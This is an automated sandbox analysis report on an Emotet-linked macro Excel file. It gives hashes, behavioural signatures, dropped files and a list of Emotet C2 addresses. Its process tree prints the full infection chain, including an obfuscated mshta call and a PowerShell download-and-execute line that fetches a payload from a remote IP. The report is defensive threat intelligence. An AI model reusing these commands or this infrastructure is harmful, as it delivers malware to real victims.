Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 10:49

General

  • Target

    ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea.xlsm

  • Size

    114KB

  • MD5

    74e51ea25acbbad7750f905be8ae1ab9

  • SHA1

    260164bae357ae9136d5693146425eb6f6b09e55

  • SHA256

    ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea

  • SHA512

    90d3b710ac2d533ec4997089091dc5100aa266f71fc3d2b836206600f1a255f5e9667a4e773a5e2e4b765517e6a395bd94dbf1e00631d4db9d2c560641272c34

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/sec.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/sec.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3960
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4212
      • C:\Windows\system32\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4768
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:840
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2392
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1944
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gxdfdkkoygmaqyud\kzuquyesevly.oui",xEURoxj
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2620
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gxdfdkkoygmaqyud\kzuquyesevly.oui",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2988
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2204 -s 1648
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4992

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    31af0fd02da0bf7acff9242cdc6125a9

    SHA1

    fb61e5e20913f14462bcf3a05156cc3903a19dd0

    SHA256

    1f690fbb9cae56c8691ca08e6f6717b715c8a613fbc549b161d03127f91eae52

    SHA512

    1e7e90bcdbcced682c351bee3e759f720883bb9fb12016b50cc43e0b734e134a9ce1a41ba775b66ba19ab41a4871945b5b958b13cbb3d8c00ca2c0665d369db2

  • \Users\Public\Documents\ssd.dll
    MD5

    31af0fd02da0bf7acff9242cdc6125a9

    SHA1

    fb61e5e20913f14462bcf3a05156cc3903a19dd0

    SHA256

    1f690fbb9cae56c8691ca08e6f6717b715c8a613fbc549b161d03127f91eae52

    SHA512

    1e7e90bcdbcced682c351bee3e759f720883bb9fb12016b50cc43e0b734e134a9ce1a41ba775b66ba19ab41a4871945b5b958b13cbb3d8c00ca2c0665d369db2

  • \Users\Public\Documents\ssd.dll
    MD5

    31af0fd02da0bf7acff9242cdc6125a9

    SHA1

    fb61e5e20913f14462bcf3a05156cc3903a19dd0

    SHA256

    1f690fbb9cae56c8691ca08e6f6717b715c8a613fbc549b161d03127f91eae52

    SHA512

    1e7e90bcdbcced682c351bee3e759f720883bb9fb12016b50cc43e0b734e134a9ce1a41ba775b66ba19ab41a4871945b5b958b13cbb3d8c00ca2c0665d369db2

  • memory/1944-335-0x0000000001000000-0x0000000001028000-memory.dmp
    Filesize

    160KB

  • memory/1944-329-0x00000000009F0000-0x0000000000A18000-memory.dmp
    Filesize

    160KB

  • memory/2620-345-0x0000000004660000-0x0000000004688000-memory.dmp
    Filesize

    160KB

  • memory/2988-351-0x0000000001050000-0x0000000001078000-memory.dmp
    Filesize

    160KB

  • memory/2988-348-0x0000000000C80000-0x0000000000CA8000-memory.dmp
    Filesize

    160KB

  • memory/3960-128-0x00007FFA94C50000-0x00007FFA94C60000-memory.dmp
    Filesize

    64KB

  • memory/3960-129-0x00007FFA94C50000-0x00007FFA94C60000-memory.dmp
    Filesize

    64KB

  • memory/3960-115-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3960-121-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3960-118-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3960-117-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3960-116-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/4768-284-0x000002A1CD620000-0x000002A1CD6E0000-memory.dmp
    Filesize

    768KB

  • memory/4768-297-0x000002A1E7A20000-0x000002A1E7A5C000-memory.dmp
    Filesize

    240KB

  • memory/4768-308-0x000002A1E7AE0000-0x000002A1E7B56000-memory.dmp
    Filesize

    472KB

  • memory/4768-317-0x000002A1CD620000-0x000002A1CD6E0000-memory.dmp
    Filesize

    768KB

  • memory/4768-283-0x000002A1CD620000-0x000002A1CD6E0000-memory.dmp
    Filesize

    768KB

  • memory/4768-275-0x000002A1E75E0000-0x000002A1E7602000-memory.dmp
    Filesize

    136KB